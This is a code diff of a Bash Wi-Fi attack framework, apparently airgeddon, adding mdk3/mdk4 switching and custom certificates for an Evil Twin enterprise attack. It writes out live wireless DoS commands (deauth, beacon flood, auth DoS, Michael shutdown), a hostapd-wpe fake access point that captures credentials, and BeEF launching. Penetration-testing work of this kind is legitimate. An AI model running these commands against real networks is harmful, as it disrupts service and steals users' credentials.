recalculate_windows_sizes - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"mdk4 amok attack\"" "mdk4 ${interface} d -b ${tmpdir}bl.txt -c ${channel}" "mdk4 amok attack" "active" - wait_for_process "mdk4 ${interface} d -b ${tmpdir}bl.txt -c ${channel}" "mdk4 amok attack" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${mdk_command} amok attack\"" "${mdk_command} ${interface} d -b ${tmpdir}bl.txt -c ${channel}" "${mdk_command} amok attack" "active" + wait_for_process "${mdk_command} ${interface} d -b ${tmpdir}bl.txt -c ${channel}" "${mdk_command} amok attack" fi } @@ -3897,8 +4258,8 @@ function exec_wdsconfusion() { language_strings "${language}" 33 "yellow" language_strings "${language}" 4 "read" recalculate_windows_sizes - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"wids / wips / wds confusion attack\"" "mdk4 ${interface} w -e ${essid} -c ${channel}" "wids / wips / wds confusion attack" "active" - wait_for_process "mdk4 ${interface} w -e ${essid} -c ${channel}" "wids / wips / wds confusion attack" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"wids / wips / wds confusion attack\"" "${mdk_command} ${interface} w -e ${essid} -c ${channel}" "wids / wips / wds confusion attack" "active" + wait_for_process "${mdk_command} ${interface} w -e ${essid} -c ${channel}" "wids / wips / wds confusion attack" fi } @@ -3925,8 +4286,8 @@ function exec_beaconflood() { language_strings "${language}" 33 "yellow" language_strings "${language}" 4 "read" recalculate_windows_sizes - manage_output "+j -sb -rightbar -geometry ${g1_topleft_window} -T \"beacon flood attack\"" "mdk4 ${interface} b -n ${essid} -c ${channel} -s 1000 -h" "beacon flood attack" "active" - wait_for_process "mdk4 ${interface} b -n ${essid} -c ${channel} -s 1000 -h" "beacon flood attack" + manage_output "+j -sb -rightbar -geometry ${g1_topleft_window} -T \"beacon flood attack\"" "${mdk_command} ${interface} b -n ${essid} -c ${channel} -s 1000 -h" "beacon flood attack" "active" + wait_for_process "${mdk_command} ${interface} b -n ${essid} -c ${channel} -s 1000 -h" "beacon flood attack" fi } @@ -3953,8 +4314,8 @@ function exec_authdos() { language_strings "${language}" 33 "yellow" language_strings "${language}" 4 "read" recalculate_windows_sizes - manage_output "+j -sb -rightbar -geometry ${g1_topleft_window} -T \"auth dos attack\"" "mdk4 ${interface} a -a ${bssid} -m -s 1024" "auth dos attack" "active" - wait_for_process "mdk4 ${interface} a -a ${bssid} -m -s 1024" "auth dos attack" + manage_output "+j -sb -rightbar -geometry ${g1_topleft_window} -T \"auth dos attack\"" "${mdk_command} ${interface} a -a ${bssid} -m -s 1024" "auth dos attack" "active" + wait_for_process "${mdk_command} ${interface} a -a ${bssid} -m -s 1024" "auth dos attack" fi } @@ -3981,13 +4342,13 @@ function exec_michaelshutdown() { language_strings "${language}" 33 "yellow" language_strings "${language}" 4 "read" recalculate_windows_sizes - manage_output "+j -sb -rightbar -geometry ${g1_topleft_window} -T \"michael shutdown attack\"" "mdk4 ${interface} m -t ${bssid} -w 1 -n 1024 -s 1024" "michael shutdown attack" "active" - wait_for_process "mdk4 ${interface} m -t ${bssid} -w 1 -n 1024 -s 1024" "michael shutdown attack" + manage_output "+j -sb -rightbar -geometry ${g1_topleft_window} -T \"michael shutdown attack\"" "${mdk_command} ${interface} m -t ${bssid} -w 1 -n 1024 -s 1024" "michael shutdown attack" "active" + wait_for_process "${mdk_command} ${interface} m -t ${bssid} -w 1 -n 1024 -s 1024" "michael shutdown attack" fi } -#Validate Mdk4 parameters -function mdk4_deauth_option() { +#Validate mdk parameters +function mdk_deauth_option() { debug_print @@ -4018,7 +4379,42 @@ function mdk4_deauth_option() { dos_pursuit_mode=1 fi - exec_mdk4deauth + exec_mdkdeauth +} + +#Switch mdk version +function mdk_version_toggle() { + + debug_print + + if [ "${AIRGEDDON_MDK_VERSION}" = "mdk3" ]; then + sed -ri "s:(AIRGEDDON_MDK_VERSION)=(mdk3):\1=mdk4:" "${scriptfolder}${rc_file}" 2> /dev/null + AIRGEDDON_MDK_VERSION="mdk4" + else + sed -ri "s:(AIRGEDDON_MDK_VERSION)=(mdk4):\1=mdk3:" "${scriptfolder}${rc_file}" 2> /dev/null + AIRGEDDON_MDK_VERSION="mdk3" + fi + + set_mdk_version +} + +#Set mdk to selected version validating its existence +function set_mdk_version() { + + debug_print + + if [ "${AIRGEDDON_MDK_VERSION}" = "mdk3" ]; then + if ! hash mdk3 2> /dev/null; then + echo + language_strings "${language}" 636 "red" + exit_code=1 + exit_script_option + else + mdk_command="mdk3" + fi + else + mdk_command="mdk4" + fi } #Validate Aireplay parameters @@ -4328,6 +4724,8 @@ function print_options() { language_strings "${language}" 595 "blue" fi + language_strings "${language}" 641 "blue" + if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "xterm" ]; then language_strings "${language}" 618 "blue" else @@ -4597,29 +4995,31 @@ function initialize_menu_options_dependencies() { debug_print - clean_handshake_dependencies=(${optional_tools_names[0]}) - aircrack_attacks_dependencies=(${optional_tools_names[1]}) - aireplay_attack_dependencies=(${optional_tools_names[2]}) - mdk4_attack_dependencies=(${optional_tools_names[3]}) - hashcat_attacks_dependencies=(${optional_tools_names[4]}) - et_onlyap_dependencies=(${optional_tools_names[5]} ${optional_tools_names[6]} ${optional_tools_names[7]}) - et_sniffing_dependencies=(${optional_tools_names[5]} ${optional_tools_names[6]} ${optional_tools_names[7]} ${optional_tools_names[8]} ${optional_tools_names[9]}) - et_sniffing_sslstrip_dependencies=(${optional_tools_names[5]} ${optional_tools_names[6]} ${optional_tools_names[7]} ${optional_tools_names[8]} ${optional_tools_names[9]} ${optional_tools_names[10]}) - et_captive_portal_dependencies=(${optional_tools_names[5]} ${optional_tools_names[6]} ${optional_tools_names[7]} ${optional_tools_names[11]}) - wash_scan_dependencies=(${optional_tools_names[13]}) - reaver_attacks_dependencies=(${optional_tools_names[14]}) - bully_attacks_dependencies=(${optional_tools_names[15]} ${optional_tools_names[17]}) - bully_pixie_dust_attack_dependencies=(${optional_tools_names[15]} ${optional_tools_names[16]} ${optional_tools_names[17]}) - reaver_pixie_dust_attack_dependencies=(${optional_tools_names[14]} ${optional_tools_names[16]}) - et_sniffing_sslstrip2_dependencies=(${optional_tools_names[5]} ${optional_tools_names[6]} ${optional_tools_names[7]} ${optional_tools_names[18]} ${optional_tools_names[19]}) - wep_attack_dependencies=(${optional_tools_names[2]} ${optional_tools_names[20]}) - enterprise_attack_dependencies=(${optional_tools_names[21]} ${optional_tools_names[22]}) - asleap_attacks_dependencies=(${optional_tools_names[22]}) - john_attacks_dependencies=(${optional_tools_names[23]}) - johncrunch_attacks_dependencies=(${optional_tools_names[23]} ${optional_tools_names[1]}) + clean_handshake_dependencies=("${optional_tools_names[0]}") + aircrack_attacks_dependencies=("${optional_tools_names[1]}") + aireplay_attack_dependencies=("${optional_tools_names[2]}") + mdk_attack_dependencies=("${optional_tools_names[3]}") + hashcat_attacks_dependencies=("${optional_tools_names[4]}") + et_onlyap_dependencies=("${optional_tools_names[5]}" "${optional_tools_names[6]}" "${optional_tools_names[7]}") + et_sniffing_dependencies=("${optional_tools_names[5]}" "${optional_tools_names[6]}" "${optional_tools_names[7]}" "${optional_tools_names[8]}" "${optional_tools_names[9]}") + et_sniffing_sslstrip_dependencies=("${optional_tools_names[5]}" "${optional_tools_names[6]}" "${optional_tools_names[7]}" "${optional_tools_names[8]}" "${optional_tools_names[9]}" "${optional_tools_names[10]}") + et_captive_portal_dependencies=("${optional_tools_names[5]}" "${optional_tools_names[6]}" "${optional_tools_names[7]}" "${optional_tools_names[11]}") + wash_scan_dependencies=("${optional_tools_names[13]}") + reaver_attacks_dependencies=("${optional_tools_names[14]}") + bully_attacks_dependencies=("${optional_tools_names[15]}" "${optional_tools_names[17]}") + bully_pixie_dust_attack_dependencies=("${optional_tools_names[15]}" "${optional_tools_names[16]}" "${optional_tools_names[17]}") + reaver_pixie_dust_attack_dependencies=("${optional_tools_names[14]}" "${optional_tools_names[16]}") + et_sniffing_sslstrip2_dependencies=("${optional_tools_names[5]}" "${optional_tools_names[6]}" "${optional_tools_names[7]}" "${optional_tools_names[18]}" "${optional_tools_names[19]}") + wep_attack_dependencies=("${optional_tools_names[2]}" "${optional_tools_names[20]}") + enterprise_attack_dependencies=("${optional_tools_names[21]}" "${optional_tools_names[22]}" "${optional_tools_names[24]}") + asleap_attacks_dependencies=("${optional_tools_names[22]}") + john_attacks_dependencies=("${optional_tools_names[23]}") + johncrunch_attacks_dependencies=("${optional_tools_names[23]}" "${optional_tools_names[1]}") + enterprise_certificates_dependencies=("${optional_tools_names[24]}") } #Set possible changes for some commands that can be found in different ways depending of the O.S. +#shellcheck disable=SC2206 function set_possible_aliases() { debug_print @@ -4629,7 +5029,7 @@ function set_possible_aliases() { arraliases=(${possible_alias_names[${item//[[:space:]]/ }]}) for item2 in "${arraliases[@]}"; do if hash "${item2}" 2> /dev/null; then - optional_tools_names=(${optional_tools_names[@]/${item}/${item2}}) + optional_tools_names=(${optional_tools_names[@]/${item}/"${item2}"}) break fi done @@ -4637,6 +5037,30 @@ function set_possible_aliases() { done } +#Modify dependencies arrays depending on selected options +function dependencies_modifications() { + + debug_print + + if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then + essential_tools_names=("${essential_tools_names[@]/xterm/tmux}") + possible_package_names[${essential_tools_names[7]}]="tmux" + unset possible_package_names["xterm"] + fi + + if [ "${AIRGEDDON_MDK_VERSION}" = "mdk3" ]; then + optional_tools_names=("${optional_tools_names[@]/mdk4/mdk3}") + possible_package_names[${optional_tools_names[3]}]="mdk3" + unset possible_package_names["mdk4"] + fi + + if [ "${iptables_nftables}" -eq 0 ]; then + optional_tools_names=("${optional_tools_names[@]/nft/iptables}") + possible_package_names[${optional_tools_names[7]}]="iptables" + unset possible_package_names["nftables"] + fi +} + #Initialize optional_tools values function initialize_optional_tools_values() { @@ -4756,7 +5180,7 @@ function clean_env_vars() { debug_print - unset AIRGEDDON_AUTO_UPDATE AIRGEDDON_SKIP_INTRO AIRGEDDON_BASIC_COLORS AIRGEDDON_EXTENDED_COLORS AIRGEDDON_AUTO_CHANGE_LANGUAGE AIRGEDDON_SILENT_CHECKS AIRGEDDON_PRINT_HINTS AIRGEDDON_5GHZ_ENABLED AIRGEDDON_FORCE_IPTABLES AIRGEDDON_DEVELOPMENT_MODE AIRGEDDON_DEBUG_MODE AIRGEDDON_WINDOWS_HANDLING + unset AIRGEDDON_AUTO_UPDATE AIRGEDDON_SKIP_INTRO AIRGEDDON_BASIC_COLORS AIRGEDDON_EXTENDED_COLORS AIRGEDDON_AUTO_CHANGE_LANGUAGE AIRGEDDON_SILENT_CHECKS AIRGEDDON_PRINT_HINTS AIRGEDDON_5GHZ_ENABLED AIRGEDDON_FORCE_IPTABLES AIRGEDDON_MDK_VERSION AIRGEDDON_DEVELOPMENT_MODE AIRGEDDON_DEBUG_MODE AIRGEDDON_WINDOWS_HANDLING } #Clean temporary files @@ -4788,6 +5212,7 @@ function clean_tmpfiles() { rm -rf "${tmpdir}${sslstrip_file}" > /dev/null 2>&1 rm -rf "${tmpdir}${webserver_file}" > /dev/null 2>&1 rm -rf "${tmpdir}${webdir}" > /dev/null 2>&1 + rm -rf "${tmpdir}${certsdir}" > /dev/null 2>&1 rm -rf "${tmpdir}${enterprisedir}" > /dev/null 2>&1 rm -rf "${tmpdir}${asleap_pot_tmp}" > /dev/null 2>&1 if [ "${dhcpd_path_changed}" -eq 1 ]; then @@ -5134,6 +5559,8 @@ function enterprise_attacks_menu() { language_strings "${language}" 55 language_strings "${language}" 56 language_strings "${language}" 49 + language_strings "${language}" 627 "separator" + language_strings "${language}" 628 enterprise_certificates_dependencies[@] language_strings "${language}" 117 "separator" language_strings "${language}" 260 enterprise_attack_dependencies[@] language_strings "${language}" 248 "separator" @@ -5158,13 +5585,20 @@ function enterprise_attacks_menu() { explore_for_targets_option "WPA" "enterprise" ;; 5) + custom_certificates_questions + create_certificates_config_files + create_custom_certificates + ;; + 6) if contains_element "${enterprise_option}" "${forbidden_options[@]}"; then forbidden_menu_option else current_iface_on_messages="${interface}" if check_interface_wifi "${interface}"; then - enterprise_mode="smooth" - et_dos_menu "enterprise" + if custom_certificates_integration; then + enterprise_mode="smooth" + et_dos_menu "enterprise" + fi else echo language_strings "${language}" 281 "red" @@ -5172,14 +5606,16 @@ function enterprise_attacks_menu() { fi fi ;; - 6) + 7) if contains_element "${enterprise_option}" "${forbidden_options[@]}"; then forbidden_menu_option else current_iface_on_messages="${interface}" if check_interface_wifi "${interface}"; then - enterprise_mode="noisy" - et_dos_menu "enterprise" + if custom_certificates_integration; then + enterprise_mode="noisy" + et_dos_menu "enterprise" + fi else echo language_strings "${language}" 281 "red" @@ -7104,6 +7540,44 @@ function manage_enterprise_log() { done } +#Check to save certs for Evil Twin Enterprise attack +function manage_enterprise_certs() { + + debug_print + + enterprisecertspath=$(env | grep ^HOME | awk -F = '{print $2}') + + lastcharenterprisecertspath=${enterprisecertspath: -1} + if [ "${lastcharenterprisecertspath}" != "/" ]; then + enterprisecertspath="${enterprisecertspath}/" + fi + enterprisecerts_suggested_dirname="enterprise_certs" + enterprisecertspath="${enterprisecertspath}${enterprisecerts_suggested_dirname}/" + + validpath=1 + while [[ "${validpath}" != "0" ]]; do + read_path "certificates" + done +} + +#Save created cert files to user's location +function save_enterprise_certs() { + + debug_print + + if [ ! -d "${enterprisecerts_completepath}" ]; then + mkdir -p "${enterprisecerts_completepath}" > /dev/null 2>&1 + fi + + cp "${tmpdir}${certsdir}server.pem" "${enterprisecerts_completepath}" 2> /dev/null + cp "${tmpdir}${certsdir}ca.pem" "${enterprisecerts_completepath}" 2> /dev/null + cp "${tmpdir}${certsdir}server.key" "${enterprisecerts_completepath}" 2> /dev/null + + echo + language_strings "${language}" 644 "blue" + language_strings "${language}" 115 "read" +} + #Check if the passwords were captured using the captive portal Evil Twin attack and manage to save them on a file function manage_captive_portal_log() { @@ -7167,7 +7641,7 @@ function parse_from_enterprise() { unset enterprise_captured_challenges_responses declare -gA enterprise_captured_challenges_responses - readarray -t CAPTURED_USERNAMES < <(grep -n -E "username:" "${tmpdir}${hostapd_wpe_log}" | sort -k 2,2 | uniq --skip-fields=1 2> /dev/null) + readarray -t CAPTURED_USERNAMES < <(grep -n -E "username:" "${tmpdir}${hostapd_wpe_log}" | sort -k 2,3 | uniq --skip-fields=1 2> /dev/null) for item in "${CAPTURED_USERNAMES[@]}"; do [[ "${item}" =~ ([0-9]+):.*username:[[:blank:]]+(.*) ]] && line_number="${BASH_REMATCH[1]}" && username="${BASH_REMATCH[2]}" line_to_check=$((line_number + 1)) @@ -7624,6 +8098,10 @@ function exec_enterprise_attack() { debug_print + rm -rf "${tmpdir}${control_enterprise_file}" > /dev/null 2>&1 + rm -rf "${tmpdir}${enterprisedir}" > /dev/null 2>&1 + mkdir "${tmpdir}${enterprisedir}" > /dev/null 2>&1 + set_hostapd_wpe_config launch_fake_ap exec_et_deauth @@ -7905,6 +8383,9 @@ function exec_et_captive_portal_attack() { debug_print + rm -rf "${tmpdir}${webdir}" > /dev/null 2>&1 + mkdir "${tmpdir}${webdir}" > /dev/null 2>&1 + set_hostapd_config launch_fake_ap set_dhcp_config @@ -8007,12 +8488,11 @@ function set_hostapd_wpe_config() { echo -e "eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user" } >> "${tmpdir}${hostapd_wpe_file}" - #TODO review certificate options for future versions. For now, using defaults { - echo -e "ca_cert=/etc/hostapd-wpe/certs/ca.pem" - echo -e "server_cert=/etc/hostapd-wpe/certs/server.pem" - echo -e "private_key=/etc/hostapd-wpe/certs/server.key" - echo -e "private_key_passwd=whatever" + echo -e "ca_cert=${hostapd_wpe_cert_path}ca.pem" + echo -e "server_cert=${hostapd_wpe_cert_path}server.pem" + echo -e "private_key=${hostapd_wpe_cert_path}server.key" + echo -e "private_key_passwd=${hostapd_wpe_cert_pass}" } >> "${tmpdir}${hostapd_wpe_file}" } @@ -8315,19 +8795,19 @@ function exec_et_deauth() { prepare_et_monitor case ${et_dos_attack} in - "Mdk4") - kill "$(ps -C mdk4 --no-headers -o pid | tr -d ' ')" &> /dev/null + "${mdk_command}") + kill "$(ps -C ${mdk_command} --no-headers -o pid | tr -d ' ')" &> /dev/null rm -rf "${tmpdir}bl.txt" > /dev/null 2>&1 echo "${bssid}" > "${tmpdir}bl.txt" - deauth_et_cmd="mdk4 ${iface_monitor_et_deauth} d -b ${tmpdir}\"bl.txt\" -c ${channel}" + deauth_et_cmd="${mdk_command} ${iface_monitor_et_deauth} d -b ${tmpdir}\"bl.txt\" -c ${channel}" ;; "Aireplay") kill "$(ps -C aireplay-ng --no-headers -o pid | tr -d ' ')" &> /dev/null deauth_et_cmd="aireplay-ng --deauth 0 -a ${bssid} --ignore-negative-one ${iface_monitor_et_deauth}" ;; "Wds Confusion") - kill "$(ps -C mdk4 --no-headers -o pid | tr -d ' ')" &> /dev/null - deauth_et_cmd="mdk4 ${iface_monitor_et_deauth} w -e ${essid} -c ${channel}" + kill "$(ps -C ${mdk_command} --no-headers -o pid | tr -d ' ')" &> /dev/null + deauth_et_cmd="${mdk_command} ${iface_monitor_et_deauth} w -e ${essid} -c ${channel}" ;; esac @@ -8800,10 +9280,6 @@ function set_enterprise_control_script() { debug_print - rm -rf "${tmpdir}${control_enterprise_file}" > /dev/null 2>&1 - rm -rf "${tmpdir}${enterprisedir}" > /dev/null 2>&1 - mkdir "${tmpdir}${enterprisedir}" > /dev/null 2>&1 - exec 7>"${tmpdir}${control_enterprise_file}" local control_msg @@ -9441,9 +9917,6 @@ function set_captive_portal_page() { debug_print - rm -rf "${tmpdir}${webdir}" > /dev/null 2>&1 - mkdir "${tmpdir}${webdir}" > /dev/null 2>&1 - { echo -e "body * {" echo -e "\tbox-sizing: border-box;" @@ -9924,7 +10397,7 @@ function manual_beef_set() { if [ -d "${manually_entered_beef_path}" ]; then if [ -f "${manually_entered_beef_path}beef" ]; then if head "${manually_entered_beef_path}beef" -n 1 2> /dev/null | grep ruby > /dev/null; then - possible_beef_known_locations+=(${manually_entered_beef_path}) + possible_beef_known_locations+=("${manually_entered_beef_path}") valid_possible_beef_path=1 else language_strings "${language}" 406 "red" @@ -9986,6 +10459,7 @@ function start_beef_service() { } #Launch beef browser exploitation framework +#shellcheck disable=SC2164 function launch_beef() { debug_print @@ -10002,7 +10476,8 @@ function launch_beef() { cp "${tmpdir}${beef_file}" "${beef_path}" > /dev/null 2>&1 manage_output "-hold -bg \"#000000\" -fg \"#00FF00\" -geometry ${g4_middleright_window} -T \"BeEF\"" "cd ${beef_path} && ./beef -c \"${beef_file}\"" "BeEF" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "cd ${beef_path} && ./beef -c \"${beef_file}\"" + cd "${beef_path}" + get_tmux_process_id "./beef -c \"${beef_file}\"" et_processes+=("${global_process_pid}") global_process_pid="" fi @@ -10180,8 +10655,8 @@ function kill_et_windows() { if [ "${dos_pursuit_mode}" -eq 1 ]; then kill_dos_pursuit_mode_processes case ${et_dos_attack} in - "Mdk4"|"Wds Confusion") - kill "$(ps -C mdk4 --no-headers -o pid | tr -d ' ')" &> /dev/null + "${mdk_command}"|"Wds Confusion") + kill "$(ps -C ${mdk_command} --no-headers -o pid | tr -d ' ')" &> /dev/null ;; "Aireplay") kill "$(ps -C aireplay-ng --no-headers -o pid | tr -d ' ')" &> /dev/null @@ -10200,6 +10675,7 @@ function kill_et_windows() { kill "${et_process_control_window}" &> /dev/null kill "$(ps -C hostapd --no-headers -o pid | tr -d ' ')" &> /dev/null fi + if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then kill_tmux_windows fi @@ -10393,13 +10869,13 @@ function dos_attacks_menu() { language_strings "${language}" 56 language_strings "${language}" 49 language_strings "${language}" 50 "separator" - language_strings "${language}" 51 mdk4_attack_dependencies[@] + language_strings "${language}" 51 mdk_attack_dependencies[@] language_strings "${language}" 52 aireplay_attack_dependencies[@] - language_strings "${language}" 53 mdk4_attack_dependencies[@] + language_strings "${language}" 53 mdk_attack_dependencies[@] language_strings "${language}" 54 "separator" - language_strings "${language}" 62 mdk4_attack_dependencies[@] - language_strings "${language}" 63 mdk4_attack_dependencies[@] - language_strings "${language}" 64 mdk4_attack_dependencies[@] + language_strings "${language}" 62 mdk_attack_dependencies[@] + language_strings "${language}" 63 mdk_attack_dependencies[@] + language_strings "${language}" 64 mdk_attack_dependencies[@] print_hint ${current_menu} read -rp "> " dos_option @@ -10423,7 +10899,7 @@ function dos_attacks_menu() { if contains_element "${dos_option}" "${forbidden_options[@]}"; then forbidden_menu_option else - mdk4_deauth_option + mdk_deauth_option fi ;; 6) @@ -10482,13 +10958,13 @@ function capture_handshake_evil_twin() { capture_handshake_window case ${et_dos_attack} in - "Mdk4") + "${mdk_command}") rm -rf "${tmpdir}bl.txt" > /dev/null 2>&1 echo "${bssid}" > "${tmpdir}bl.txt" recalculate_windows_sizes - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_bottomleft_window} -T \"mdk4 amok attack\"" "mdk4 ${interface} d -b ${tmpdir}bl.txt -c ${channel}" "mdk4 amok attack" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_bottomleft_window} -T \"${mdk_command} amok attack\"" "${mdk_command} ${interface} d -b ${tmpdir}bl.txt -c ${channel}" "${mdk_command} amok attack" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface} d -b ${tmpdir}bl.txt -c ${channel}" + get_tmux_process_id "${mdk_command} ${interface} d -b ${tmpdir}bl.txt -c ${channel}" processidattack="${global_process_pid}" global_process_pid="" fi @@ -10507,9 +10983,9 @@ function capture_handshake_evil_twin() { ;; "Wds Confusion") recalculate_windows_sizes - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_bottomleft_window} -T \"wids / wips / wds confusion attack\"" "mdk4 ${interface} w -e ${essid} -c ${channel}" "wids / wips / wds confusion attack" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_bottomleft_window} -T \"wids / wips / wds confusion attack\"" "${mdk_command} ${interface} w -e ${essid} -c ${channel}" "wids / wips / wds confusion attack" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface} w -e ${essid} -c ${channel}" + get_tmux_process_id "${mdk_command} ${interface} w -e ${essid} -c ${channel}" processidattack="${global_process_pid}" global_process_pid="" fi @@ -10605,7 +11081,7 @@ function validate_path() { lastcharmanualpath=${1: -1} - if [ "${2}" = "enterprisepot" ]; then + if [[ "${2}" = "enterprisepot" ]] || [[ "${2}" = "certificates" ]]; then dirname=$(dirname "${1}") if [ -d "${dirname}" ]; then @@ -10637,7 +11113,7 @@ function validate_path() { fi fi - if [[ "${lastcharmanualpath}" = "/" ]] || [[ -d "${1}" ]] || [[ "${2}" = "enterprisepot" ]]; then + if [[ "${lastcharmanualpath}" = "/" ]] || [[ -d "${1}" ]] || [[ "${2}" = "enterprisepot" ]] || [[ "${2}" = "certificates" ]]; then if [ "${lastcharmanualpath}" != "/" ]; then pathname="${1}/" else @@ -10706,6 +11182,23 @@ function validate_path() { fi fi + echo + language_strings "${language}" 158 "yellow" + return 0 + ;; + "certificates") + enterprisecertspath="${pathname}" + enterprisecerts_basepath=$(dirname "${enterprisecertspath}") + + if [ "${enterprisecerts_basepath}" != "/" ]; then + enterprisecerts_basepath+="/" + fi + + enterprisecerts_completepath="${enterprisecertspath}" + if [ "${enterprisecertspath: -1}" != "/" ]; then + enterprisecerts_completepath+="/" + fi + echo language_strings "${language}" 158 "yellow" return 0 @@ -10904,6 +11397,14 @@ function read_path() { fi validate_path "${enterprisepotenteredpath}" "${1}" ;; + "certificates") + language_strings "${language}" 643 "blue" + read_and_clean_path "certificatesenteredpath" + if [ -z "${certificatesenteredpath}" ]; then + certificatesenteredpath="${enterprisecertspath}" + fi + validate_path "${certificatesenteredpath}" "${1}" + ;; esac validpath="$?" @@ -10954,9 +11455,9 @@ function attack_handshake_menu() { print_simple_separator language_strings "${language}" 147 print_simple_separator - language_strings "${language}" 139 mdk4_attack_dependencies[@] + language_strings "${language}" 139 mdk_attack_dependencies[@] language_strings "${language}" 140 aireplay_attack_dependencies[@] - language_strings "${language}" 141 mdk4_attack_dependencies[@] + language_strings "${language}" 141 mdk_attack_dependencies[@] print_hint ${current_menu} read -rp "> " attack_handshake_option @@ -10974,9 +11475,9 @@ function attack_handshake_menu() { rm -rf "${tmpdir}bl.txt" > /dev/null 2>&1 echo "${bssid}" > "${tmpdir}bl.txt" recalculate_windows_sizes - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_bottomleft_window} -T \"mdk4 amok attack\"" "mdk4 ${interface} d -b ${tmpdir}bl.txt -c ${channel}" "mdk4 amok attack" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_bottomleft_window} -T \"${mdk_command} amok attack\"" "${mdk_command} ${interface} d -b ${tmpdir}bl.txt -c ${channel}" "${mdk_command} amok attack" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface} d -b ${tmpdir}bl.txt -c ${channel}" + get_tmux_process_id "${mdk_command} ${interface} d -b ${tmpdir}bl.txt -c ${channel}" processidattack="${global_process_pid}" global_process_pid="" fi @@ -11009,9 +11510,9 @@ function attack_handshake_menu() { ask_timeout "capture_handshake" capture_handshake_window recalculate_windows_sizes - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_bottomleft_window} -T \"wids / wips / wds confusion attack\"" "mdk4 ${interface} w -e ${essid} -c ${channel}" "wids / wips / wds confusion attack" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_bottomleft_window} -T \"wids / wips / wds confusion attack\"" "${mdk_command} ${interface} w -e ${essid} -c ${channel}" "wids / wips / wds confusion attack" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface} w -e ${essid} -c ${channel}" + get_tmux_process_id "${mdk_command} ${interface} w -e ${essid} -c ${channel}" processidattack="${global_process_pid}" global_process_pid="" fi @@ -11853,9 +12354,9 @@ function et_dos_menu() { language_strings "${language}" 266 fi print_simple_separator - language_strings "${language}" 139 mdk4_attack_dependencies[@] + language_strings "${language}" 139 mdk_attack_dependencies[@] language_strings "${language}" 140 aireplay_attack_dependencies[@] - language_strings "${language}" 141 mdk4_attack_dependencies[@] + language_strings "${language}" 141 mdk_attack_dependencies[@] print_hint ${current_menu} read -rp "> " et_dos_option @@ -11870,7 +12371,7 @@ function et_dos_menu() { if contains_element "${et_dos_option}" "${forbidden_options[@]}"; then forbidden_menu_option else - et_dos_attack="Mdk4" + et_dos_attack="${mdk_command}" echo language_strings "${language}" 509 "yellow" @@ -12347,7 +12848,7 @@ function iptables_nftables_detection() { debug_print if ! "${AIRGEDDON_FORCE_IPTABLES:-false}"; then - if hash nft 2> /dev/null; then + if hash nft 2> /dev/null; then iptables_nftables=1 else iptables_nftables=0 @@ -12645,9 +13146,11 @@ function update_options_config_file() { for item in "${OPTION_VARS[@]}"; do option_name="${item%=*}" option_value="${item#*=}" - if [[ "${ordered_options_env_vars[@]}" =~ ${option_name} ]]; then - sed -ri "s:(${option_name})=(.+):\1=${option_value}:" "${scriptfolder}${rc_file}" 2> /dev/null - fi + for item2 in "${ordered_options_env_vars[@]}"; do + if [ "${item2}" = "${option_name}" ]; then + sed -ri "s:(${option_name})=(.+):\1=${option_value}:" "${scriptfolder}${rc_file}" 2> /dev/null + fi + done done ;; esac @@ -13078,6 +13581,7 @@ function check_root_permissions() { } #Print Linux known distros +#shellcheck disable=SC2207 function print_known_distros() { debug_print @@ -13404,6 +13908,12 @@ function initialize_script_settings() { declare -gA wps_data_array declare -gA interfaces_band_info tmux_error=0 + custom_certificates_country="" + custom_certificates_state="" + custom_certificates_locale="" + custom_certificates_organization="" + custom_certificates_email="" + custom_certificates_cn="" } #Detect if there is a working X window system excepting for docker container and wayland @@ -13562,15 +14072,18 @@ function env_vars_initialization() { "AIRGEDDON_PRINT_HINTS" "AIRGEDDON_5GHZ_ENABLED" "AIRGEDDON_FORCE_IPTABLES" + "AIRGEDDON_MDK_VERSION" "AIRGEDDON_DEVELOPMENT_MODE" "AIRGEDDON_DEBUG_MODE" "AIRGEDDON_WINDOWS_HANDLING" ) declare -gA nonboolean_options_env_vars - nonboolean_options_env_vars["${ordered_options_env_vars[11]},default_value"]="xterm" + nonboolean_options_env_vars["${ordered_options_env_vars[9]},default_value"]="mdk4" + nonboolean_options_env_vars["${ordered_options_env_vars[12]},default_value"]="xterm" - nonboolean_options_env_vars["${ordered_options_env_vars[11]},rcfile_text"]="#Available values: xterm, tmux - Define the needed tool to be used for windows handling - Default value xterm" + nonboolean_options_env_vars["${ordered_options_env_vars[9]},rcfile_text"]="#Available values: mdk3, mdk4 - Define which mdk version is going to be used - Default value mdk4" + nonboolean_options_env_vars["${ordered_options_env_vars[12]},rcfile_text"]="#Available values: xterm, tmux - Define the needed tool to be used for windows handling - Default value xterm" declare -gA boolean_options_env_vars boolean_options_env_vars["${ordered_options_env_vars[0]},default_value"]="true" @@ -13582,8 +14095,8 @@ function env_vars_initialization() { boolean_options_env_vars["${ordered_options_env_vars[6]},default_value"]="true" boolean_options_env_vars["${ordered_options_env_vars[7]},default_value"]="true" 